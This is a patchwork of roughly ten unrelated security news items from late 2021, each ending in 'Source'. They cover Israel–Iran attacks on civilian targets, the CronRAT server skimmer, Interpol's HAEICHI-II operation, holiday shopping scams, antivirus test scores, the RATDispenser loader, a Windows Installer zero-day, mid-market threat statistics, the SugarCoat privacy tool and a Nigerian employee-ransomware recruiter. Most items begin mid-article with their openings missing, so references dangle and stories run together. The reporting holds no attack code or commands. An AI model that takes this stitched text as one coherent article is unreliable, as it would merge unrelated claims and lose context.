No one died in these attacks, but if their goal was to create chaos, anger, and emotional distress on a large scale, they succeeded wildly.

“Perhaps there’s a war going on between Israel and Iran, but from the little civilian’s perspective we are being held as prisoners here in the middle and are helpless,” said Beni Kvodi, 52, an editor at an Israeli radio station.

Mr. Kvodi has been openly gay for years, but the hack on the Israeli dating site threatened to expose thousands of Israelis who had not come out publicly about their sexual orientation. The site collected embarrassing information about users’ sexual habits, as well as explicit photos.

Ali, a 39-year-old driver with the national taxi company in Tehran who, like other Iranians interviewed, asked that his last name not be used out of fear for his security, said he lost a day of work waiting in gas station lines that snaked for miles.

“Every day you wake up in this country and you have a new problem,” he said in a telephone interview. “It isn’t our fault our governments are enemies. It’s already hard enough for us to survive.”

Both countries appear to be striking out at civilians to send messages to their governments.

The hack on Iran’s fuel distribution system took place on Oct. 26, near the two-year anniversary of large antigovernment protests set off by a sudden increase in gasoline prices. The government responded then with a brutal crackdown, which Amnesty International said killed more than 300 people.

The cyberattack appeared aimed at generating another wave of antigovernment unrest.

Gas pumps suddenly stopped working and a digital message directed customers to complain to Iran’s supreme leader, Ayatollah Ali Khamenei, displaying the phone number of his office.

The hackers took control of billboards in cities like Tehran and Isfahan, replacing ads with the message “Khamenei, where is my gasoline?”

“At 11 a.m. suddenly the pumps stopped working,” said Mohsen, the manager of a gas station in northern Tehran. “I have never seen anything like this.”

Rumors spread that the government had engineered the crisis to raise fuel prices. Iran’s app-based taxi companies, Snap and Tapsi, doubled and tripled their normal fares in response to drivers having to purchase expensive unsubsidized fuel, Iranian news media reported.

The antigovernment uprising never materialized but the government scrambled to contain the damage and tamp down the uproar. The Oil Ministry and the National Cyber Council held emergency meetings. The oil minister, Javad Owji, issued a rare public apology on state television, and pledged an extra 10 liters of subsidized fuel to all car owners.

To get pumps back online, the ministry had to send technicians to every gas station in the country. Once the pumps were reset, most stations could still sell only unsubsidized fuel, which is twice the price of subsidized fuel.

It took nearly two weeks to restore the subsidy network, which allots each vehicle 60 liters — about 16 gallons — a month at half price.

But the hack may have been more serious than an inconvenience to motorists.

A senior manager in the Oil Ministry and an oil dealer with knowledge of the investigation, who spoke on the condition of anonymity to avoid repercussions, said that officials were alarmed that hackers had also gained control of the ministry’s fuel storage tanks and may have had access to data on international oil sales, a state secret that could expose how Iran evades international sanctions.

Because the ministry’s computer servers contain such sensitive data, the system operates unconnected to the internet, leading to suspicions among Iranian officials that Israel may have had inside help.

Four days after Iran’s pumps stopped working, hackers gained access to the databank of the Israeli dating site Atraf, and medical files at Machon Mor Medical Institute, a network of private clinics in Israel.

Files from both hacks — including the personal information of about 1.5 million Israelis, about 16 percent of the country’s population — were posted to a channel on the Telegram messaging app.

The Israeli government asked Telegram to block the channel, which it did. But the hackers, a little-known group called Black Shadow, immediately reposted the material on a new channel, and continued to do so each time it was blocked.

The group also posted files stolen from the Israeli insurance company Shirbit, which was hacked last December and insured employees of Israel’s Defense Ministry.

Three senior Israeli officials, who asked not to be identified in order to discuss secret cyber issues, said that Black Shadow was either part of the Iranian government or freelance hackers working for the government.

Personal data from the dating site could be disastrous “even for those who are already out of the closet,,” Mr. Kvodi said. “Each one of us has a very close and intimate ‘relationship’ with Atraf.”

The site contains not only names and addresses, he said, but also “our sexual preferences, who’s H.I.V. positive, who uses prophylactics or does not, along with the fact that the site makes it possible to upload nude photographs and relevant video footage of us and to send them to other subscribers.”

Many Atraf subscribers soon complained that their Instagram, Facebook or gmail accounts had also been hacked.

Cyber experts said these hacks were not the work of Black Shadow but knock-on hacks by criminals who used the personal data Black Shadow had posted. In some cases, they blocked the accounts, demanding ransom to restore access.

Neither Israel nor Iran has publicly claimed responsibility or laid blame for the latest round of cyberattacks. Israeli officials refused to publicly accuse Iran, and Iranian officials have blamed the gas station attack on a foreign country, stopping short of naming one.

Experts say the cyberattacks on softer civilian targets could be the start of a new phase in the conflict.

Lotem Finkelstein, head of intelligence at Check Point, a cybersecurity company, said that Iranian hackers had “identified a failure in Israeli understanding” about cyber conflict.

They realized that “they do not need to attack a government agency, which is much more protected,” but could easily attack small, private companies, with less sophisticated security, “that control enormous amounts of information, including financial or intimate personal information about many citizens.”

Each side blames the other for the escalation, and even if there were the will to stop it, it’s hard to see how this genie gets recorked.

“We are in a dangerous phase,” Maysam Behravesh, a former chief analyst for Iran’s Intelligence Ministry, said in a Clubhouse chat on Monday. “There will be a next round of widespread cyberattack on our infrastructure. We are a step closer to military confrontation.”

The post Israel and Iran Broaden Cyberwar to Attack Civilian Targets appeared first on New York Times.

Source

Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet.

CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk.

"The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st."

The RAT — a "sophisticated Bash program" — also uses many levels of obfuscation to make analysis difficult, such as placing code behind encoding and compression barriers, and implementing a custom binary protocol with random checksums to slip past firewalls and packet inspectors, before establishing communications with a remote control server to await further instructions.

Armed with this backdoor access, the attackers associated with CronRAT can run any code on the compromised system, the researchers noted.

"Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface."

Source

This crackdown results from a four-month action codenamed ‘Operation HAEICHI-II,’ which took place in twenty countries between June and September 2021.

These were Angola, Brunei, Cambodia, Colombia, China, India, Indonesia, Ireland, Japan, Korea (Rep. of), Laos, Malaysia, Maldives, Philippines, Romania, Singapore, Slovenia, Spain, Thailand, and Vietnam.

On the financial aspect of the operation, the authorities have also intercepted nearly $27,000,000 and froze 2,350 banking accounts linked to various online crimes.

As the Interpol announcement details, at least ten new criminal modus operandi were identified in HAEICHI-II, indicative of the evolving nature of cyber-crime.

International fraud

One notable example of fraud unearthed in HAEICHI-II involves a Colombian textiles company tricked by BEC (Business Email Compromise) actors.

The perpetrators impersonated a legal representative of the company and asked $16 million in two payments of $8,000,000 to be sent to two Chinese bank accounts.

Interpol’s intervention helped retrieve 94% of this amount, saving the firm from bankruptcy.

In another case, a Slovenian firm was deceived into transferring $800,000 to money mule accounts in China. Interpol worked with the authorities in Beijing and helped return the full amount to the victim.

A rising trend the investigators noticed during HAEICHI-II was using the ‘Squid Game’ as a theme for malware distribution campaigns.

The actors took advantage of the popularity of the Netflix show to masquerade trojanized apps that were supposedly mobile games.

In reality, these apps automatically subscribed users to ‘premium’ services and inflate their bills, while their distributors cash in from affiliations.

“Online scams like those leveraging malicious apps evolve as quickly as the cultural trends they opportunistically exploit,” said José De Gracia, Assistant Director, Criminal Networks at Interpol.

“Sharing information on emerging threats is vital to the ability of police to protect the victims of online financial crime. It also lets police know that no country is alone in this fight. Operation HAECHI-II shows that we can successfully strike back against this threat when we act together.”

HAEICHI-I

Interpol’s previous large-scale online fraud crackdown operation was HAEICHI-I, spanning between September 2020 and March 2021.

That operation involved 40 law enforcement officers and focused predominately on the Asia Pacific region, resulting in 500 arrests.

The amount of money intercepted was $83,000,000, while the authorities also identified and froze 1,600 bank accounts belonging to fraudsters.

Interpol arrests over 1,000 suspects linked to cyber crime

Black Friday is approaching, and cybercriminals are honing their malware droppers, phishing lures, and fake sites while shoppers prepare to open their wallets.

As researchers at Kaspersky point out, scammers are already targeting people with fake tickets for the FIFA World Cup 2022.

The security firm shared a detailed report highlighting the most common threats expected to surface during this year's Black Friday, as well as the Christmas shopping season.

Phishing for data and e-payment accounts

Kaspersky's products alone detected over 40 million phishing attacks from January to October 2021, with Amazon, eBay, Alibaba, and Mercado Libre being the most popular lures.

As such, if you receive emails concerning promotions and discounts on large e-commerce platforms, you should treat them with extra caution.

In terms of trends, phishing actors doubled their effort to steal account credentials for e-payment systems (also known as online payment systems), with October 2021 seeing a rise of 208% compared to the month before.

While banking credentials are still targeted, phishing actors tend to favor e-payment systems more now, as those have risen in popularity by 40% during the last two years.

Banking trojans fading

Kaspersky has found that cybercriminals used 11 distinct malware families against shoppers in 2021, with more than half of them being variants of Zeus banking trojan.

The list of other popular strains used in 2021 malware attacks also includes Qbot (deployed in 13.9% of the total number of incidents), Anubis (13.4%), Trickbot (11.6%), and Neurevt (4.8%).

An interesting trend emerging from Kaspersky's stats is the number of infections, which has dropped from 20 million in the past two years to just 10 million this year.

This decline is in line with the shift of the threat actors' attention to electronic payments. Most of these trojan families have a narrow targeting scope limited to specific financial institutes or platforms, so they require more effort to target a larger array of potential victims.

Malware deployed now is more specialized for e-commerce platforms, looking to steal e-shop account credentials, bank card numbers, CVVs, expiration dates, and phone numbers.

Ending up on malicious sites

There are two categories of fake sites that can lead to problems for victims. The first one is phishing sites that steal credentials and the second one is scam sites that steal money.

In the first case, the lures typically come in the form of emails allegedly sent by high-profile online shops or popular e-commerce platforms, directing recipients to a fake login page.

The second case involves sites that have cloned real shops by copying their CSS and all content or just fake markets that receive payments without sending anything to the buyer.

In some cases, these platforms do send an empty envelope to the victims, only for providing a valid tracking number and delay reports that would allow hosting providers or authorities to take them down faster.

This also reduces the chances of PayPal payment disputes blocking the funds from ending in the scammers' accounts and allowing victims to recover their money.

How to stay safe while shopping online

Remember, you will see many product discounts and sales promotions during the holidays. However, the chances of some of them being scams are higher than usual.

To protect yourself and your banking account, you should use an internet security solution from a trusty vendor and always double-check that you're on a legitimate site before entering your payment info.

If you stumble upon an offer that seems too good to be true, it's probably a scam even in the context of Black Friday.

Finally, if you can use e-payments instead of credit cards, it would be preferable due to the less severe repercussions in the case of a data breach.

There are also one-time virtual cards with charging limits, so if you want to play it safe while shopping from less-known shops, there are ways to do it.

If you have to pay with your bank account or card, verify that the right amount has been charged and monitor all future transactions closely.

How cybercriminals adjusted their scams for Black Friday 2021

Very much to the delight of Microsoft surely, Windows Defender has scored very highly in this assessment. In fact, it is one of the very best available today scoring the full 18 points available. Hence it has received the "AV-TEST TOP PRODUCT" certification as it has scored higher than 17.5 points in total.

However, it is not alone at the top and other security programs like Avira, AVAST, AVG, Bitdefender, ESET, and others, have also received this seal of approval. The remainder of the products have scored below 17.5 points and have hence received the "AV-TEST Certified" badge.

The full score of 18 points in the test constitutes three categories of a maximum of six points each. These categories are:

• Protection
• Performance
• Usability

The image below shows how each of the 21 tested anti-virus programs has scored in the three categories differentiated by shades of blue:

You can find the full test report for October 2021 here.

Source

HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware have been discovered, spread across three different variants, hinting that it's under active development.

"RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device," security researcher Patrick Schläpfer said. "All the payloads were RATs, designed to steal information and give attackers control over victim devices."

As with other attacks of this kind, the starting point of the infection is a phishing email containing a malicious attachment, which masquerades as a text file, but in reality is obfuscated JavaScript code programmed to write and execute a VBScript file, which, in turn, downloads the final-stage malware payload on the infected machine.

RATDispenser has been observed dropped different kinds of malware, including STRRAT, WSHRAT (aka Houdini or Hworm), AdWind (aka AlienSpy or Sockrat), Formbook (aka xLoader), Remcos (aka Socmer), Panda Stealer, CloudEyE (aka GuLoader), and Ratty, each of which are equipped to siphon sensitive data from the compromised devices, in addition to targeting cryptocurrency wallets.

"The variety in malware families, many of which can be purchased or downloaded freely from underground marketplaces, and the preference of malware operators to drop their payloads, suggest that the authors of RATDispenser may be operating under a malware-as-a-service business model," Schläpfer said.

Source

A new Windows zero-day vulnerability affects all versions of Windows, including fully patched Windows 11 and Windows Server 2022 installations.

Jason Schultz, Technical Leader at Talos Security Intelligence & Research Group, shared details of the vulnerability, which stems from a previous Windows Installer bug that Microsoft thought it had patched earlier this month (CVE-2021-41379). The original vulnerability allowed a user with a limited account to escalate their privileges and delete targeted files on a system. This new vulnerability looks to be more serious, though.

Security researcher Abdelhamid Naceri, who Microsoft acknowledged for their help in the notes of the CVE-2021-41379 patch, did an analysis of the patch and found "the bug was not fixed correctly." Abdelhamid posted details on GitHub and explained how this variant is more powerful than the original because it completely bypasses the group policy included in the administrative install feature of Windows. The knock-on effect being that an attacker can replace any executable file on the system with an MSI file and can run code as an administrator.

Right now, there is no patch to fix this vulnerability and malware samples have been discovered in the wild. So it's a known vulnerability and if it's not being used already it will be pretty soon. Abdelhamid believes the only action users can take is to wait for Microsoft to release another security patch because of the complexity of the vulnerability, and "any attempt to patch the binary directly will break windows installer."

As ever, Windows users should be running a security suite and keeping all their software applications updated as a precaution against any malicious activity. Hopefully the coverage this zero-day exploit is receiving encourages Microsoft to create and release a security patch quickly.

Source

A midsize or mid-market business is generally defined as a company employing 1,000 to 2,000 employees with annual revenues between $10 million and $1 billion. There are more than 200,000 such businesses in the US, and they account for around one-third of our annual gross domestic product (GDP), according to Dun & Bradstreet’s database of commercially active US firms. That's a healthy portion of our economy, and yet most of these firms seem to have what amounts to digital tissue paper between themselves and a cyber attack.

Security technology provider Coro just completed a study of security preparedness in the mid-market space, and the numbers are truly disturbing. According to Coro's research, midsize businesses were targeted at least 50% more in 2021 than in 2020. Some sectors, notably healthcare and transportation, experienced up to 125% more attacks in that span, and others, including retail and manufacturing, saw increases up to 90%.

The volume of attacks isn't the only thing on the rise. What's really scary is that the sophistication of hacking attempts and the overall attack surfaces have gone up, too. Coro's research shows that compared to 2020, the kinds of attacks being leveled at smaller businesses have spanned the gamut of cyber sliminess, including traditional endpoint malware but also Wi-Fi phishing, insider threats, and especially, ransomware.

Coro says that a big reason smaller companies were targeted more in 2021 is the new normal of hybrid work. This trend has many mid-market companies relying almost entirely on third-party cloud services for productivity software while managing a nearly 100% remote workforce that's also using a large number of unmanaged devices. In other words, your software and data is in the wild and wooly web, while your endpoints are, well just about anywhere.

Add to that the scarcity of competent IT security specialists, and it's easy to see why many mid-market companies are adopting the hermit-crab approach to cybersecurity: Keep your head down, and hope the threats just pass you by. This isn't entirely unreasonable, since there are so many more small businesses than enterprises operating today. What are the odds the bad guys will single out your little firm? Well, starting this year, the odds have gotten better, and the attacks have become a lot smarter.

(Chart: courtesy of Coro)

And because most midsize companies lack a security specialist, many aren't even aware of the new threats that face them. For example, Coro's numbers show the volume and types of email attacks has risen 154% between 2020 and 2021, yet only 1% of midsize companies have actual email protection in place. And of those, 88% have their security settings misconfigured according to current best practices. The more sophisticated or uncommon an attack type is, the worse these numbers become.

A good example is Wi-Fi phishing. This is when the bad guys set up a Wi-Fi router or access point that looks like it's a legit contact point to your company network. Employees connect to the device, and cybercriminals now have access to every packet of data going through it. Most smaller companies don't consider this kind of attack, because it usually involves some on-site criminal presence, either someone outside with a wireless device or even someone who has snuck into the office and planted a fake access point that looks just like a real one.

This is where the hermit-crab mentality can hurt you. Most smaller companies don't consider themselves large enough to warrant such in-person attacks, so they don't protect themselves effectively. Regarding Wi-Fi phishing, Coro says these attacks have increased by a jaw-dropping 203% against mid-market companies with, again, only 1% having any kind of protection in place and a misconfiguration rate within that 1% of around 90%.

Midsize companies need to accept that the most insidious digital danger facing them in 2022 is that the bad guys actually know who they are.

Coro terms non-targeted attacks as "naive," and its research shows these attacks have dropped from 86% against smaller companies in 2020 down to 68% in 2021. Meanwhile, targeted attacks within that same period have grown between 2 and 4 times. Even more granular than incursions against a specific company are attacks that target a specific role or even a certain person. Against companies without adequate identity management, these attacks have risen from 12% in 2020 to 26% in 2021.

Bottom line: In only one year, the criminals that smaller companies are defending themselves against haven't just gotten smarter—they're now looking at you in particular. Watch your back.

Source

The tool, named SugarCoat, targets scripts that harm users’ privacy—for example, by tracking their browsing history around the Web—yet are essential for the websites that embed them to function. SugarCoat replaces these scripts with scripts that have the same properties, minus the privacy-harming features. SugarCoat is designed to be integrated into existing privacy-focused browsers like Brave, Firefox, and Tor, and browser extensions like uBlock Origin. SugarCoat is open source and is currently being integrated into the Brave browser.

"SugarCoat is a practical system designed to address the lose-lose dilemma that privacy-focused tools face today: Block privacy-harming scripts, but break websites that rely on them; or keep sites working, but give up on privacy," said Deian Stefan, an assistant professor in the UC San Diego Department of Computer Science and Engineering. "SugarCoat eliminates this trade-off by allowing the scripts to run, thus preserving compatibility, while preventing the scripts from accessing user-private data."

The researchers are describing their work at the ACM Conference on Computer and Communications Security (CCS) taking place in Seoul, Korea, Nov. 14 to 19, 2021.

"SugarCoat integrates with existing content-blocking tools, like ad blockers, to empower users to browse the Web without giving up their privacy," said Michael Smith, a PhD student in Stefan’s research group, who is leading the project.

Most existing content-blocking tools make very coarse-grained decisions: They either totally block or totally allow a script to run, based on whether it appears on a public list of privacy-harming scripts.  In practice, though, some scripts are both privacy-harming and necessary for websites to function—and most tools inevitably choose to make an exception and allow these scripts to run. Today, there are more than 6,000 exception rules letting through these privacy-harming scripts.

There is a better approach, though. Instead of blocking a script entirely or allowing it to run, content-blocking tools can replace its source code with an alternative privacy-preserving version. For example, instead of loading popular website analytics scripts which also track users, content-blocking tools replace these scripts with fake versions that look the same. This ensures that the content-blocking tools are not breaking web pages that embed these scripts and that the scripts can’t access private data (and thus report it back to the analytics companies). To date, crafting such privacy-preserving replacement scripts has been a slow, manual task even for privacy engineering experts. uBlock Origin, for example, maintains replacements for only 27 scripts, compared to the over 6,000 exception rules.

How SugarCoat changes the game

The researchers developed SugarCoat precisely to address this gap by automatically generating privacy-preserving replacement scripts.  The tool uses the PageGraph tracing framework—Smith was key to the development of the framework—to follow the behavior of privacy-harming scripts throughout the browser engine.  

SugarCoat scans this data to identify when and how the scripts talk to Web Platform APIs that expose privacy-sensitive data.  SugarCoat then rewrites the scripts’ source code to talk to fake “SugarCoated” APIs instead, which look like the Web Platform APIs but don’t actually expose any private data. 

To evaluate the impact of SugarCoat on Web functionality and performance, the team integrated the rewritten scripts into the Brave browser; they found that SugarCoat effectively protected users’ private data without impacting functionality or page load performance. SugarCoat is now being deployed in production at Brave.

“Brave is excited to start deploying the results of the year-long SugarCoat research project,” said Peter Snyder, senior privacy researcher and director of privacy at Brave Software. “SugarCoat gives Brave and other privacy projects a powerful, new capability for defeating online trackers, and helps keep users in control of the Web."

This work was supported by the NSF under grant numbers CCF-1918573 and CAREER CNS-2048262, by a gift from Brave Software, and by an NSF Graduate Research Fellowship. 

SugarCoat: Programmatically Generating Privacy-Preserving, Web-Compatible Resource Replacements for Content Blocking

Michael Smith and Deian Stefan, University of California San Diego

Benjamin Livshits, Imperial College of London

Peter Snyder, Brave Software

Source

The brazen approach targeting disgruntled employees was first spotted by threat intelligence firm Abnormal Security, which described what happened after they adopted a fake persona and responded to the proposal in the screenshot above.

“According to this actor, he had originally intended to send his targets—all senior-level executives—phishing emails to compromise their accounts, but after that was unsuccessful, he pivoted to this ransomware pretext,” Abnormal’s Crane Hassold wrote.

Abnormal Security documented how it tied the email back to a Nigerian man who acknowledged he was trying to save up money to help fund a new social network he is building called Sociogram. In June 2021, the Nigerian government officially placed an indefinite ban on Twitter, restricting it from operating in Nigeria after the social media platform deleted tweets by the Nigerian president.

Reached via LinkedIn, Sociogram founder Oluwaseun Medayedupin asked to have his startup’s name removed from the story, although he did not respond to questions about whether there were any inaccuracies in Hassold’s report.

“Please don’t harm Sociogram’s reputation,” Medayedupin pleaded. “I beg you as a promising young man.”

After he deleted his LinkedIn profile, I received the following message through the “contact this domain holder” link at KrebsOnSecurity’s domain registrar [curiously, the date of that missive reads “Dec. 31, 1969.”]. Apparently, Mr. Krebson is a clout-chasing monger.

A love letter from the founder of the ill-fated Sociogram.

Mr. Krebson also heard from an investigator representing the Nigeria Finance CERT on behalf of the Central Bank Of Nigeria. While the Sociogram founder’s approach might seem amateurish to some, the financial community in Nigeria did not consider it a laughing matter.

On Friday, Nigerian police arrested Medayedupin. The investigator says formal charges will be levied against the defendant sometime this week.

The petition for arrest.

Medayedupin being booked.

Seized laptop.

KrebsOnSecurity spoke with a fraud investigator who is performing the forensic analysis of the devices seized from Medayedupin’s home. The investigator spoke on condition of anonymity out of concern for his physical safety.

The investigator — we’ll call him “George” — said the 23-year-old Medayedupin lives with his extended family in an extremely impoverished home, and that the young man told investigators he’d just graduated from college but turned to cybercrime at first with ambitions of merely scamming the scammers.

George’s team confirmed that Medayedupin had around USD $2,000 to his name, which he’d recently stolen from a group of Nigerian fraudsters who were scamming people for gift cards. Apparently, he admitted to creating a phishing website that tricked a member of this group into providing access to the money they’d made from their scams.

Medayedupin reportedly told investigators that for almost a week after he started emailing his ransom-your-employer scheme, nobody took him up on the offer. But after his name appeared in the news media, he received thousands of inquiries from people interested in his idea.

George described Medayedupin as smart, a quick learner, and fairly dedicated to his work.

“He seems like he could be a fantastic [employee] for a company,” George said. “But there is no employment here, so he chose to do this.”

What’s interesting about this case — and indeed likely why anyone thought this guy worthy of arrest — is that the Nigerian authorities were fairly swift to take action when a domestic cybercriminal raised the specter of causing financial losses for its own banks.

After all, the majority of the cybercrime that originates from Africa — think romance scams, Business Email Compromise (BEC) fraud, and unemployment/pandemic loan fraud — does not target Nigerian citizens, nor does it harm African banks. On the contrary: This activity pumps a great deal of Western money into Nigeria.

How much money are we talking about? The financial losses from these scams dwarf other fraud categories — such as identity theft or credit card fraud. According to the FBI’s Internet Crime Complaint Center (IC3), consumers and businesses reported more than $4.2 billion in losses tied to cybercrime in 2020, and BEC fraud and romance scams alone accounted for nearly 60 percent of those losses.

Source: FBI/IC3 2020 Internet Crime Report.

If the influx of a few billion US dollars into the Nigerian economy each year from cybercrime seems somehow insignificant, consider that (according to George) the average police officer in the country makes the equivalent of less than USD $100 a month.

Ronnie Tokazowski is a threat researcher at Agari, a security firm that has closely tracked many of the groups behind BEC scams. Tokazowski maintains he has been one of the more vocal proponents of the idea that trying to fight these problems by arresting those involved is something of a Sisyphean task, and that it makes way more sense to focus on changing the economic realities in places like Nigeria.

Nigeria has the world’s second-highest unemployment rate — rising from 27.1 percent in 2019 to 33 percent in 2020, according to the National Bureau of Statistics. The nation also is among the world’s most corrupt, according to 2020 findings from Transparency International.

“Education is definitely one piece, as raising awareness is hands down the best way to get ahead of this,” Tokazowski said, in a June 2021 interview. “But we also need to think about ways to create more business opportunities there so that people who are doing this to put food on the table have more legitimate opportunities. Unfortunately, thanks to the level of corruption of government officials, there are a lot of cultural reasons that fighting this type of crime at the source is going to be difficult.”

Source